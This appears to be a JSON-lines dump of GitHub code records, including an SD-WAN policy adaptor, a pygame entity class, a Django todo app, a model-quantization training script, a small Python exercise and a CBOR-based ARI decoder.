data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_data_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_data_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove)\n logger.debug(\"New merge policy is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_data_policy(policy_id, policy, 'create_data_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_data_policy_with_all_endpoints')\n \n def create_approute_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n # Collect all endpoint + sla info for each profile\n cnwan_seqs = []\n \n for name, data in self.app_route_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'AppRoute')\n if defined: \n \n previous_cnwan_remove.append(data['policyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_approute_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove) \n logger.debug(\"New merge policy 
for AppRoute is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_approute_policy(policy_id, policy, 'create_approute_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_approute_policy_with_all_endpoints')\n \n def is_traffic_profile_defined(self, profileName):\n if profileName in self.app_route_traffic_profiles.keys():\n return True, 'AppRoute'\n elif profileName in self.data_traffic_profiles.keys():\n return True, 'Data'\n else:\n return False, None\n\n\n\n### POLICY MANAGEMENT\n \n def is_policy_defined(self, policyName, policyType):\n if policyType == 'AppRoute':\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policyName)\n \n elif policyType == 'Data':\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policyName)\n \n else: \n return False, None\n \n \n if policy_id is None:\n return False, None\n else:\n return True, policy_id\n \n def is_policy_in_mappings(self, policyName, policyType):\n \n if policyType == 'AppRoute':\n for name, data in self.app_route_traffic_profiles.items(): \n if data['policyName'] == policyName:\n return True, name\n \n elif policyType == 'Data':\n for name, data in self.data_traffic_profiles.items():\n if data['policyName'] == policyName:\n return True, name\n \n return False, None\n \n \n def empty_approute_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n def add_endpoint_array_approute_policy(self, policy_id, endpoints, call_origin): \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_approute_policy(endpoints, policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n \n def empty_data_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n \n \n \n def add_endpoint_array_data_policy(self, policy_id, endpoints, call_origin):\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_data_policy(endpoints, policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n\n \n \n\n### EXPOSED API FUNCITONS\n\n def get_mappings(self):\n\n temp = []\n for name, data in self.app_route_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"AppRoute\",\n \"policyName\" : data['policyName']\n }\n temp.append(profile)\n\n for name, data in self.data_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"Data\",\n \"policyName\" : data['policyName']\n\n }\n temp.append(profile)\n\n return temp\n\n def post_mapping(self, mapping):\n\n if mapping[\"metadataKey\"] not in self.metadata_keys:\n 
self.metadata_keys.append(mapping[\"metadataKey\"])\n logger.info('Detected new metadata key %s, adding to list.', mapping[\"metadataKey\"])\n \n \n name = mapping['metadataValue']\n profile_type = mapping['policyType']\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(mapping['policyName'], profile_type)\n\n if name in self.app_route_traffic_profiles.keys() or \\\n name in self.data_traffic_profiles.keys():\n \n msg = 'Ignoring request: the traffic profile ' + name + ' is already defined '\n logger.warning(err.ElementAlreadyDefined(\"post_traffic_profile\", msg))\n\n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + mapping['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n \n if profile_type == 'AppRoute':\n self.app_route_traffic_profiles[name] = {\n 'policyName': mapping['policyName']\n }\n \n elif profile_type == 'Data':\n self.data_traffic_profiles[name] = {\n 'policyName' : mapping['policyName']\n }\n \n else:\n logger.warning('Ignoring request: unknow traffic policy type.')\n logger.warning(err.UnsupportedPolicyType(profile_type, ['AppRoute', 'Data']))\n\n\n \n\n def delete_mapping(self, profile_name):\n self.check_config()\n self.test_connection()\n \n if profile_name in self.app_route_traffic_profiles.keys(): \n \n #Delete endpoints from the policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'AppRoute')\n if policy_defined:\n\n self.empty_approute_policy(policy_name,'delete_mapping')\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints()\n \n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n \n # Delete traffic profile from internal variable\n del self.app_route_traffic_profiles[profile_name]\n \n\n elif profile_name in self.data_traffic_profiles.keys():\n \n #Delete endpoints from the policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'Data')\n if policy_defined:\n \n self.empty_data_policy(policy_name, 'delete_traffic_profile')\n #No active policies affected because these profiles are never active\n\n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints()\n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n\n \n # Delete traffic profile from internal variable\n del self.data_traffic_profiles[profile_name]\n \n else:\n logger.warning(err.CannotFindElement(\"delete_traffic_profile\",\\\n \"This traffic profile does not exist, ignoring request.\"))\n\n\n def put_mapping(self, profile_name, data):\n self.check_config()\n self.test_connection()\n \n \n profile_defined, profile_type = self.is_traffic_profile_defined(profile_name)\n # Verify new policiy is defined\n policy_defined, new_policy_id = self.is_policy_defined(data['policyName'], data['policyType'])\n #Verify policy NOT in use in other mappings\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(data['policyName'], data['policyType'])\n \n if not profile_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"This traffic profile does not exist, ignoring request.\"))\n \n \n elif not policy_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"The policy \" + str(data['policyName']) 
+\" does not exist in the sdwan controller, ignoring request.\"))\n \n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + data['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n #List affected endpoints \n endpoints = self.get_service_endpoints_by_profile(profile_name)\n \n if profile_type == 'AppRoute':\n #Empty old policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n self.empty_approute_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'AppRoute':\n # AppRoute to AppRoute\n #Add enpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Update internal var\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n else:\n # AppRoute to Data\n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n\n \n #Change type of profile\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name] = {\n 'policyName' : data['policyName']\n } \n del self.app_route_traffic_profiles[profile_name]\n\n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n elif profile_type == 'Data':\n #Empty old policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n self.empty_data_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'Data':\n # Data to Data \n \n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n # Update internal var\n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints(old_policy)\n\n \n else:\n # Data to AppRoute\n \n #Add endpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Change type of profile \n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name] = {\n 'policyName': data['policyName']\n }\n del self.data_traffic_profiles[profile_name]\n \n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints(old_policy)\n self.create_approute_policy_with_all_endpoints()\n\n #Update internal endpoint variable\n for ep in endpoints:\n self.srv_endpoints[ep]['policyId'] = new_policy_id\n\n\n\n def extract_profile(self, service):\n if 'metadata' not in service:\n return None\n \n for elem in service['metadata']:\n if elem['key'] in self.metadata_keys:\n return elem['value']\n return None\n \n def get_md_key_not_defined(self, service):\n if 'metadata' not in service:\n return ['MISSING METADATA ARRAY']\n \n not_def = []\n for elem in service['metadata']:\n if elem['key'] not in self.metadata_keys:\n not_def.append(elem['key'])\n \n return not_def\n\n def events(self, updates):\n self.check_config()\n self.test_connection()\n error_events =[]\n \n for elem in updates:\n ipAddress = elem['service']['address']\n portNumber = 
str(elem['service']['port'])\n profileName = self.extract_profile(elem['service'])\n logger.debug('Processing %s event on endpoint %s:%s', elem['event'], ipAddress, portNumber)\n \n \n \n if elem['event'] == 'delete':\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif profileName is None:\n #Unknown metadata key \n error = {}\n error['status'] = 400\n error['resource'] = elem['service']['name']\n error['title'] = 'MISSING METADATA KEY'\n error['description'] = 'The metadata key ' + str(self.get_md_key_not_defined(elem['service'])) + ' is \\\n not currently defined in the adaptor. Ignoring this event.'\n error_events.append(error)\n \n elif elem['event'] == 'create':\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif elem['event'] == 'update':\n error, error_data = self.put_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n\n else:\n #Unknown operation\n error = {}\n error['status'] = 405\n error['resource'] = elem['service']['name']\n error['title'] = 'Unsupoorted eventy type'\n error['description'] = 'The event ' + elem['event'] + ' is not currently \\\n supported. Supported events: create, update and delete.'\n error_events.append(error)\n \n \n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints() \n \n if len(error_events) != 0:\n logger.warning('The following elements were ingored: %s', error_events)\n raise err.PartialEventsError(error_events)\n\n","repo_name":"CloudNativeSDWAN/cnwan-adaptor","sub_path":"adaptor_library/metadata_adaptor/core_lib.py","file_name":"core_lib.py","file_ext":"py","file_size_in_byte":31295,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
+{"seq_id":"33399990847","text":"from GameEntity import GameEntity\nimport random\n\n\nclass SkillBox(GameEntity):\n\n POSSIB_SKILLS = {\n 1: 'TELEPORT_UP',\n 2: 'BIG_JUMP',\n 3: 'GHOST_MODE'\n }\n\n def __init__(self, x_game_init, y_game_init):\n super(SkillBox, self).__init__()\n super(SkillBox, self).setXY(x_game_init, y_game_init)\n\n taille = len(SkillBox.POSSIB_SKILLS)\n diceroll = random.randint(1, taille)\n self.skill_id = diceroll\n self.skillname = SkillBox.POSSIB_SKILLS[diceroll]\n self.visible = True\n\n def updatePosition(self):\n # descente progressive des bonus skill\n x_ent, y_ent = self.getXY()\n self.setXY(x_ent, y_ent - 0.4)\n\n # def markToDisplay(self, surface):\n # x_ent,y_ent = self.getXY()\n # pygame.draw.rect( surface, pygame.Color('BROWN'),\n # pygame.Rect( x_ent,y_ent, 30,30) )\n","repo_name":"wkta/esc_segfault","sub_path":"SkillBox.py","file_name":"SkillBox.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32406692316","text":"import tensorflow as tf\nimport src.api as api\nimport argparse\nimport os\n\nfrom src.controllers.ui_controller import UIController\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='Config filepath.')\n parser.add_argument('-n', '--name', required=False, help='Name of the experiment. If none provided, name with a timestamp will be assigned.')\n parser.add_argument('-w', '--warnings', required=False, default=False, action='store_true', help='Display tensorflow warning.')\n args = parser.parse_args()\n verify_args(args)\n set_logging(args)\n return args\n\ndef verify_args(args):\n assert os.path.exists(args.config), 'Config filepath is not valid.'\n assert type(args.name) == str, 'Experiment name must be a string.'\n\ndef set_logging(args):\n if args.warnings == False:\n print(' - Hiding tensorflow output messages.')\n tf.get_logger().setLevel('ERROR')\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef get_user_input(ui_controller):\n ui_controller.print_parameters('model')\n ui_controller.ask_parameters()\n ui_controller.print_parameters('training')\n ui_controller.print_parameters('validation')\n ui_controller.print_parameters('testing')\n ui_controller.ask_parameters()\n ui_controller.ask_retrain()\n ui_controller.ask_retest()\n return ui_controller\n\ndef main(config_path, experiment_name):\n config = api.get_config(config_path)\n api.setup_experiment(experiment_name, config)\n\n ui_controller = UIController(config, experiment_name)\n ui_controller = get_user_input(ui_controller)\n\n if ui_controller.skip_training == False:\n api.train(config, experiment_name, ui_controller.new_training)\n \n if ui_controller.skip_testing == False:\n api.test(config, experiment_name, ui_controller.new_testing)\n api.evaluate(experiment_name)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.config, args.name)\n print(' - Script has finished successfully.')","repo_name":"MicrobialDarkMatter/Fishnchips_basecaller","sub_path":"run_fishnchips.py","file_name":"run_fishnchips.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70019090087","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\n# Create your views here.\nfrom todos_list_demo.todos.forms import CreateTodoForm\nfrom todos_list_demo.todos.models import Todo\n\n\ndef list_todos(request):\n todos = Todo.objects.all()\n\n context = {\n 'todos': todos,\n }\n\n\n return render(request, 'todos/list_todos.html', context)\n\n\ndef my_profile(request, pk):\n user = User.objects.get(pk=pk)\n\n context = {\n 'user': user\n }\n\n return render(request, 'my_profile.html', context)\n\n\ndef index(request):\n return redirect('list todos')\n\n\ndef create_todo(request):\n if request.method == 'POST':\n form = CreateTodoForm(request.POST)\n\n if form.is_valid():\n form.save()\n redirect('list todos')\n\n else:\n form = CreateTodoForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'todos/create_todo.html', context)","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Framework/todos_list_demo/todos_list_demo/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71248938727","text":"from __future__ import print_function\nimport os, random\nimport copy\nimport numpy as np\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport network\nfrom utils.visualizer import VisdomPlotter\nfrom utils.loss import *\nfrom dataloader import get_dataloader\nfrom quantization import quantize_model\n\n\nvp = VisdomPlotter('8097', env='ZAQ-main')\n\ndef train(args, p_model, q_model, generator, optimizer, epoch):\n p_model.eval()\n q_model.train()\n generator.train()\n optimizer_Q, optimizer_G = optimizer\n\n inter_loss = SCRM().to(args.device)\n\n for i in range(args.epoch_itrs):\n for k in range(5):\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_Q.zero_grad()\n fake = generator(z).detach()\n g_p, p_logit = p_model(fake, True)\n g_q, q_logit = q_model(fake, True)\n loss_Q = F.l1_loss(q_logit, p_logit.detach()) + args.alpha * inter_loss(g_q, g_p)\n \n loss_Q.backward()\n optimizer_Q.step()\n\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_G.zero_grad()\n generator.train()\n fake = generator(z)\n g_p, p_logit = p_model(fake, True) \n g_q, q_logit = q_model(fake, True)\n\n loss_G = - F.l1_loss(q_logit, p_logit) - args.alpha * inter_loss(g_q, g_p) - args.beta * g_p[-1].abs().mean()\n\n loss_G.backward()\n optimizer_G.step()\n\n if i % args.log_interval == 0:\n print('Train Epoch: [{}] [{}/{} ({:.0f}%)]\\tG_Loss: {:.6f} Q_loss: {:.6f}'.format(\n epoch, i, args.epoch_itrs, 100*float(i)/float(args.epoch_itrs), loss_G.item(), loss_Q.item()))\n vp.add_scalar('Loss_Q', (epoch-1)*args.epoch_itrs+i, loss_Q.item())\n vp.add_scalar('Loss_G', (epoch-1)*args.epoch_itrs+i, loss_G.item())\n\ndef test(args, model, test_loader, epoch=0):\n model.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n data, target = data.to(args.device), target.to(args.device)\n\n output = model(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nEpoch [{}] Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n epoch, test_loss, correct, len(test_loader.dataset),\n 100. 
* correct / len(test_loader.dataset)))\n acc = correct/len(test_loader.dataset)\n return acc\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='ZAQ CIFAR.')\n parser.add_argument('--num_classes', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='input batch size for training (default: 256)')\n parser.add_argument('--test_batch_size', type=int, default=256, metavar='N',\n help='input batch size for testing (default: 128)')\n \n parser.add_argument('--epochs', type=int, default=300, metavar='N',\n help='number of epochs to train (default: 500)')\n parser.add_argument('--epoch_itrs', type=int, default=60)\n parser.add_argument('--lr_Q', type=float, default=0.1, metavar='LR',\n help='learning rate (default: 0.1)')\n parser.add_argument('--lr_G', type=float, default=1e-3,\n help='learning rate (default: 0.001)')\n parser.add_argument('--data_root', type=str, required=True, default=None)\n\n parser.add_argument('--dataset', type=str, default='cifar10', choices=['cifar10', 'cifar100'],\n help='dataset name (default: cifar10)')\n parser.add_argument('--model', type=str, default='resnet18', \n choices=['mobilenetv2', 'vgg19', 'resnet18', 'resnet20', 'resnet50'],\n help='model name (default: resnet18)')\n parser.add_argument('--weight_decay', type=float, default=5e-4)\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--device', type=str, default='0',\n help='device for training')\n parser.add_argument('--seed', type=int, default=6786, metavar='S',\n help='random seed (default: 6786)')\n parser.add_argument('--ckpt', type=str, default='')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--nz', type=int, default=256)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--beta\", type=float, default=0.1)\n parser.add_argument(\"--gamma\", type=float, default=0.1)\n parser.add_argument('--test_only', action='store_true', default=False)\n parser.add_argument('--download', action='store_true', default=False)\n\n # quantization \n parser.add_argument('--weight_bit', type=int, default=6, help='bit-width for parameters')\n parser.add_argument('--activation_bit', type=int, default=8, help='bit-width for act')\n \n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n os.environ['CUDA_VISIBLE_DEVICES'] = args.device\n args.device = torch.device('cuda' if torch.cuda.is_available() else \"cpu\")\n os.makedirs('checkpoint/q_model/', exist_ok=True)\n print(args)\n\n _, test_loader = get_dataloader(args)\n\n args.num_classes = 10 if args.dataset=='cifar10' else 100\n q_model = network.get_model(args)\n generator = network.gan.Generator(nz=args.nz, nc=3, img_size=32)\n \n q_model.load_state_dict(torch.load(args.ckpt))\n print(\"p_model restored from %s\"%(args.ckpt))\n\n # p_model = p_model.to(device)\n q_model = q_model.to(args.device)\n generator = generator.to(args.device)\n p_model = copy.deepcopy(q_model)\n\n # quantization\n q_model = quantize_model(q_model, args)\n quant_acc = test(args, q_model, test_loader, 0)\n print('Quat Acc=%0.4f \\n' % quant_acc)\n\n p_model.eval()\n\n optimizer_Q = 
optim.SGD(q_model.parameters(), lr=args.lr_Q, weight_decay=args.weight_decay, momentum=0.9)\n    optimizer_G = optim.Adam(generator.parameters(), lr=args.lr_G)\n    \n    scheduler_Q = optim.lr_scheduler.MultiStepLR(optimizer_Q, [100, 200], args.gamma)\n    scheduler_G = optim.lr_scheduler.MultiStepLR(optimizer_G, [100, 200], args.gamma)\n    best_acc = 0\n    if args.test_only:\n        acc = test(args, q_model, test_loader, 0)\n        return\n    acc_list = []\n    for epoch in range(1, args.epochs + 1):\n        # Train\n        train(args, p_model=p_model, q_model=q_model, generator=generator, optimizer=[optimizer_Q, optimizer_G], epoch=epoch)\n        scheduler_Q.step()\n        scheduler_G.step()\n        # Test\n        acc = test(args, q_model, test_loader, epoch)\n        acc_list.append(acc)\n        if acc>best_acc:\n            best_acc = acc\n            print('Saving a best checkpoint ...')\n            torch.save(q_model.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit.pt\"%(args.dataset, args.model, args.weight_bit))\n            torch.save(generator.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit-generator.pt\"%(args.dataset, args.model, args.weight_bit))\n        vp.add_scalar('Acc', epoch, acc)\n        print(\"Best Acc=%.6f\" % best_acc)\n\n    import csv\n    os.makedirs('log', exist_ok=True)\n    # argparse defines weight_bit (there is no param_bits attribute), so use it for the log filename as well\n    with open('log/ZAQ-%s-%s-%sbit.csv'%(args.dataset, args.model, args.weight_bit), 'a') as f:\n        writer = csv.writer(f)\n        writer.writerow(acc_list)\n\nif __name__ == '__main__':\n    main()","repo_name":"FLHonker/ZAQ-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"}
+{"seq_id":"70564225129","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\ndef soma_impares(inicio, fim):\n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tsoma = 0\n\twhile inicio < fim:\t\t\n\t\tsoma += inicio\n\t\tinicio += 2\n\n\treturn soma\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v3.py","file_name":"1071_v3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23266427398","text":"import enum\nimport logging\nimport struct\nfrom typing import BinaryIO\nimport cbor2\nfrom ace.ari import (\n ARI, AC, EXPR, TNVC, Identity, ReferenceARI, LiteralARI,\n StructType, LITERAL_TYPES\n)\nfrom ace.cborutil import to_diag\nfrom ace.util import is_printable\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@enum.unique\nclass AriFlag(enum.IntFlag):\n ''' Flags at the front of an ARI. '''\n HAS_NN = 0x80\n HAS_PARAMS = 0x40\n HAS_ISS = 0x20\n HAS_TAG = 0x10\n\n\n@enum.unique\nclass TnvcFlag(enum.IntFlag):\n ''' Flgas at the front of a TNVC. '''\n MIXED = 0x8\n TYPE = 0x4\n NAME = 0x2\n VALUE = 0x1\n\n\nclass ParseError(RuntimeError):\n ''' Indicate an error in ARI parsing. '''\n\n\nclass Decoder:\n ''' The decoder portion of this CODEC. '''\n\n def decode(self, buf: BinaryIO) -> ARI:\n ''' Decode an ARI from CBOR bytestring.\n\n :param buf: The buffer to read from.\n :return: The decoded ARI.\n '''\n cbordec = cbor2.CBORDecoder(buf)\n try:\n res = self._decode_ari(cbordec)\n except cbor2.CBORDecodeEOF as err:\n raise ParseError(f'Failed to decode ARI: {err}') from err\n if buf.tell() != len(buf.getbuffer()):\n LOGGER.warning('ARI decoder handled only the first %d octets of %s',\n buf.tell(), to_diag(buf.getvalue()))\n return res\n\n def _decode_ari(self, cbordec):\n flags, = struct.unpack('!B', cbordec.read(1))\n LOGGER.debug('Got flags: 0x%02x', flags)\n str_type = StructType(flags & 0x0F)\n\n if str_type == StructType.LIT:\n try:\n val = cbordec.decode()\n except Exception as err:\n raise ParseError(f'Failed to decode literal value: {err}') from err\n\n type_enum = StructType((flags >> 4) + StructType.BOOL)\n res = LiteralARI(type_enum=type_enum, value=val)\n\n else:\n obj_nn = cbordec.decode() if flags & AriFlag.HAS_NN else None\n LOGGER.debug('Got nickname: %s', obj_nn)\n\n name = cbordec.decode()\n LOGGER.debug('Got name: %s', to_diag(name))\n if not isinstance(name, (bytes, str)):\n raise ParseError(f'Decoded name is not bytes or str, got {type(name)}')\n if isinstance(name, bytes) and is_printable(name):\n name = name.decode('utf-8')\n\n params = self._decode_tnvc(cbordec) if flags & AriFlag.HAS_PARAMS else None\n\n issuer = cbordec.decode() if flags & AriFlag.HAS_ISS else None\n LOGGER.debug('Got issuer: %s', to_diag(issuer))\n if issuer is not None and not isinstance(issuer, bytes):\n raise ParseError(f'Decoded issuer is not bytes, got {type(issuer)}')\n\n tag = cbordec.decode() if flags & AriFlag.HAS_TAG else None\n LOGGER.debug('Got tag: %s', to_diag(issuer))\n if tag is not None and not isinstance(tag, bytes):\n raise ParseError(f'Decoded tag is not bytes, got {type(tag)}')\n\n ident = Identity(\n namespace=obj_nn,\n type_enum=str_type,\n name=name,\n issuer=issuer,\n tag=tag\n )\n res = ReferenceARI(ident=ident, params=params)\n\n return res\n\n def _decode_tnvc(self, cbordec):\n ''' From the document:\n +--------+---------+----------+----------+----------+----------+\n | Flags | # Items | Types | Names | Values | Mixed |\n | [BYTE] | [UINT] | [OCTETS] | [OCTETS] | [OCTETS] | [OCTETS] |\n | | (Opt) | (Opt) | (Opt) | (Opt) | (Opt) |\n +--------+---------+----------+----------+----------+----------+\n '''\n\n flags, = struct.unpack('!B', cbordec.read(1))\n\n count = cbordec.decode() if flags else 0\n\n type_enums = []\n if flags & TnvcFlag.TYPE:\n for _idx in range(count):\n type_id = struct.unpack('!B', cbordec.read(1))[0]\n type_enums.append(StructType(type_id))\n\n if flags & TnvcFlag.NAME:\n raise NotImplementedError\n\n values = []\n 
